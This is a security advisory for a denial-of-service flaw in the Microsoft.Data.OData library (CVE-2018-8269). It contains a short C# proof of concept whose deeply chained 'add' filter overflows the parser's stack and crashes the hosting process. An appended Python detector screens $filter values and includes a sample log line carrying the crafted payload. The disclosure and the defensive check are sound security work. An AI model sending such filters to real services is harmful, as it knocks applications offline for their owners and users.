OData Denial of Service Vulnerability

Aleph Research Advisory

Identifier

Severity

High

Products

  1. Microsoft.Data.OData

Vulnerable Version

version 5.8.3 and below

Mitigation

Upgrade to version 5.8.4

Technical Details

The library Microsoft.Data.OData is used for handling OData V1-3 requests.

It is used by many applications and services that expose an OData API, including SharePoint Server and the Azure Active Directory Graph API. It has ~ 30,000,000 downloads on NuGet (the .NET package manager).

A core functionality of the library is parsing an OData filter.

Parsing a crafted OData filter with this library results in deep recursion, which raises a StackOverflowException and crashes the hosting process.

An application that uses this library to provide an OData API might be vulnerable to a DoS attack. An attacker can shut down the application remotely by sending a crafted request a few times.

Information about the exploitation of the vulnerability can be found in our blog post.

Proof Of Concept

The following program demonstrates how a crafted filter can be used to trigger a StackOverflowException.

using System.Linq;
using Microsoft.Data.Edm.Library;
using Microsoft.Data.OData.Query;
using Microsoft.Data.OData.Query.SemanticAst;

namespace TestOdata
{
    class Program
    {
        static void Main(string[] args)
        {
            // Minimal EDM model: the parser only needs an entity type to bind the filter against.
            EdmModel model = new EdmModel();
            var customer = new EdmEntityType("TestModel", "TestModel");

            // Generate the filter "1 add 1 add 1 add 1 add ......" (11200 binary operators)
            string filter = string.Concat(Enumerable.Repeat("1 add ", 11200)) + "1";

            // The following call throws StackOverflowException in version 5.8.3 and below
            FilterClause filterClause = ODataUriParser.ParseFilter(filter, model, customer);
        }
    }
}
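As an added defensive example (not part of this advisory and not Microsoft's library code), the following Python check measures the length, binary-operator count and parenthesis depth of a decoded $filter value, so a front end can reject a filter shaped like the one above before it reaches the vulnerable parser, and the same check can be run over access logs. The thresholds, the log line format and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed thresholds; tune against legitimate traffic before enforcing them.
MAX_FILTER_LENGTH, MAX_BINARY_OPS, MAX_PAREN_DEPTH = 2048, 100, 32
# Each OData V1-3 binary operator costs one recursion level in the affected parser.
BINARY_OPS = re.compile(r"\b(add|sub|mul|div|mod|and|or|eq|ne|gt|ge|lt|le)\b", re.IGNORECASE)
# Single-quoted string literals ('' escapes a quote) are blanked so their text is not counted.
STRING_LITERAL = re.compile(r"'(?:[^']|'')*'")

def filter_metrics(filter_text):
    """Measure a decoded $filter value: length, binary-operator count, max parenthesis depth."""
    stripped = STRING_LITERAL.sub("''", filter_text)
    depth = current = 0
    for ch in stripped:
        if ch == "(":
            current += 1
            depth = max(depth, current)
        elif ch == ")":
            current = max(0, current - 1)
    return {"length": len(filter_text), "paren_depth": depth,
            "binary_ops": len(BINARY_OPS.findall(stripped))}

def is_suspicious(filter_text):
    """True when the filter should be rejected (or flagged) before it reaches the parser."""
    m = filter_metrics(filter_text)
    return m["length"] > MAX_FILTER_LENGTH or m["binary_ops"] > MAX_BINARY_OPS or m["paren_depth"] > MAX_PAREN_DEPTH

def extract_filter(url):
    """Return the URL-decoded $filter query option of a request URL, or None if absent."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("$filter")
    return values[0] if values else None

def scan_log(lines):
    """Return (url, metrics) for every log line whose $filter trips a threshold."""
    hits = []
    for line in lines:
        for token in line.split():  # assumed format: the request URL is one whitespace-delimited field
            filter_text = extract_filter(token) if "?" in token else None
            if filter_text is not None and is_suspicious(filter_text):
                hits.append((token, filter_metrics(filter_text)))
                break
    return hits

# Constructed sample access-log lines: two benign requests and one shaped like the PoC filter.
SAMPLE_LOG = [
    "2018-10-22 10:00:01 GET /odata/Customers?$filter=Name%20eq%20%27Alice%27 200",
    "2018-10-22 10:00:02 GET /odata/Customers?$top=5 200",
    "2018-10-22 10:00:03 GET /odata/Customers?$filter=" + "1%20add%20" * 300 + "1 500",
]
```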

Timeline

  • 22-Oct-18
    : Public disclosure.
  • 11-Sep-18
    : CVE-2018-8269 assigned.
  • 14-Aug-18
    : Patch available.
  • 27-Jun-18
    : Reported (Remote attack vector).
  • 22-Apr-18
    : Reported (Microsoft Security Response Center).

Posts

Credit

External References